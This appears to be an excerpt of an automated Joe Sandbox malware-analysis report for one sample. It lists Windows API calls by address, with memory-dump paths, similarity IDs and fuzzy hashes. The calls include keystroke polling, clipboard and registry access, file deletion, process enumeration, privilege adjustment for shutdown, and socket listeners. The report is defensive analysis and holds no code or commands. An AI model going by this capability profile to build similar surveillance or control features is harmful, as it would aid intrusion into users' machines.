                                                  • Part of subcall function 007C852A: HeapAlloc.KERNEL32(00000000,?,007C800A,?,?,?), ref: 007C8566
                                                  • Part of subcall function 007C852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C857D
                                                  • Part of subcall function 007C85C7: GetProcessHeap.KERNEL32(00000008,007C8020,00000000,00000000,?,007C8020,?), ref: 007C85D3
                                                  • Part of subcall function 007C85C7: HeapAlloc.KERNEL32(00000000,?,007C8020,?), ref: 007C85DA
                                                  • Part of subcall function 007C85C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8020,?), ref: 007C85EB
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8238
                                                • _memset.LIBCMT ref: 007C824D
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C826C
                                                • GetLengthSid.ADVAPI32(?), ref: 007C827D
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C82BA
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C82D6
                                                • GetLengthSid.ADVAPI32(?), ref: 007C82F3
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8302
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8309
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C832A
                                                • CopySid.ADVAPI32(00000000), ref: 007C8331
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8362
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8388
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C839C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oax$UCP)$UTF)$UTF16)
                                                • API String ID: 0-1328661864
                                                APIs
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0537
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F05D6
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F066E
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F08AD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F08BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0062
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D00E3
                                                • GetKeyState.USER32(000000A0), ref: 007D00FE
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0118
                                                • GetKeyState.USER32(000000A1), ref: 007D012D
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D0145
                                                • GetKeyState.USER32(00000011), ref: 007D0157
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D016F
                                                • GetKeyState.USER32(00000012), ref: 007D0181
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0199
                                                • GetKeyState.USER32(0000005B), ref: 007D01AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D38E7
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D398F
                                                • MoveFileW.KERNEL32(?,?), ref: 007D39A2
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D39BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D39E1
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D39FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$Oax$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-919343562
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DF4CC
                                                • Sleep.KERNEL32(0000000A), ref: 007DF4FC
                                                • _wcscmp.LIBCMT ref: 007DF510
                                                • _wcscmp.LIBCMT ref: 007DF52B
                                                • FindNextFileW.KERNEL32(?,?), ref: 007DF5C9
                                                • FindClose.KERNEL32(00000000), ref: 007DF5DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 713712311-438819550
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • _memmove.LIBCMT ref: 007C05AE
                                                • _memmove.LIBCMT ref: 007C06C3
                                                • _memmove.LIBCMT ref: 007C076A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID: yZx
                                                • API String ID: 1300846289-3136013853
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D3BCD
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 007D3C1D
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D3C2E
                                                • FindClose.KERNEL32(00000000), ref: 007D3C45
                                                • FindClose.KERNEL32(00000000), ref: 007D3C4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                APIs
                                                  • Part of subcall function 007C8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                  • Part of subcall function 007C8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                  • Part of subcall function 007C8AA3: GetLastError.KERNEL32 ref: 007C8B27
                                                • ExitWindowsEx.USER32(?,00000000), ref: 007D52A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID: Oax
                                                • API String ID: 674341424-2797580295
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E63F2
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6401
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E641D
                                                • listen.WSOCK32(00000000,00000005), ref: 007E642C
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6446
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E645A
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 007719FA
                                                • GetSysColor.USER32(0000000F), ref: 00771A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00771A61
                                                  • Part of subcall function 00771290: DefDlgProcW.USER32(?,00000020,?), ref: 007712D8
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DBD72
                                                • _wcscmp.LIBCMT ref: 007DBDA2
                                                • _wcscmp.LIBCMT ref: 007DBDB7
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DBDC8
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DBDF8
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                APIs
                                                  • Part of subcall function 007E7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7ECB
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E68B4
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E68DD
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E6916
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6923
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6937
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007DC4BE
                                                • CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DC4D6
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • CoUninitialize.OLE32 ref: 007DC743
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,007B1CB7,?), ref: 007EC112
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC124
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007EEF51
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007EEF5F
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007EF01F
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF02E
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007CE93A
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007E1920,00000000), ref: 007E24F7
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E252E
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB3CF
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007DB429
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007DB476
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                • GetLastError.KERNEL32 ref: 007C8B27
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007D4A31
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4A48
                                                • FreeSid.ADVAPI32(?), ref: 007D4A58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
                                                • Instruction ID: 0c753bd1df185d0612e14a34310e35deee78ce2201e24e9246fedccc7de329e1
                                                • Opcode Fuzzy Hash: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
                                                • Instruction Fuzzy Hash: AAF03C75A51208BFDB00DFE0DC89ABDBBB8EF08201F008469E501E2181DA745A048B54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76dd32fbea31d981d39ab39650f8b8a29316725b18d10cbb4d6de69aa03994d6
                                                • Instruction ID: 4e7d1a63f1016a9b63e5cccfe9a0a0666f389ac12cd65382e6c9f408cbdb2f11
                                                • Opcode Fuzzy Hash: 76dd32fbea31d981d39ab39650f8b8a29316725b18d10cbb4d6de69aa03994d6
                                                • Instruction Fuzzy Hash: B0229D70A00219DFDF24DF54C485ABEB7B1FF08354F24C5A9E85A9B351E378A981CB91
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC787
                                                • FindClose.KERNEL32(00000000), ref: 007DC7B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 67c392f2caa319d8af3f7982d99b21b01767d607c258b47199df44a246012ec0
                                                • Instruction ID: 839252f68e6e9b8365cc56553d637bebb753ec09baed500fa4f36c87a0907dc2
                                                • Opcode Fuzzy Hash: 67c392f2caa319d8af3f7982d99b21b01767d607c258b47199df44a246012ec0
                                                • Instruction Fuzzy Hash: 1E118E326002009FDB10DF29C889A2AF7E9FF84320F00C51EFAA997390DB34A800CB81
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007E957D,?,007FFB84,?), ref: 007DA121
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007E957D,?,007FFB84,?), ref: 007DA133
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 7fc723475ab02c6104ab1c8c85a02668df557d25ea74b2ad4afa15a7b3d8bb35
                                                • Instruction ID: 0009d6a1d8be01461e8e45ed73d82900971e8a9a9a98169cc7f8cdd50afa75df
                                                • Opcode Fuzzy Hash: 7fc723475ab02c6104ab1c8c85a02668df557d25ea74b2ad4afa15a7b3d8bb35
                                                • Instruction Fuzzy Hash: 60F0823550522DFBDB10AFA4CC49FEA777CFF09361F008266F909D6281DA349944CBA1
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8631), ref: 007C8508
                                                • CloseHandle.KERNEL32(?,?,007C8631), ref: 007C851A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
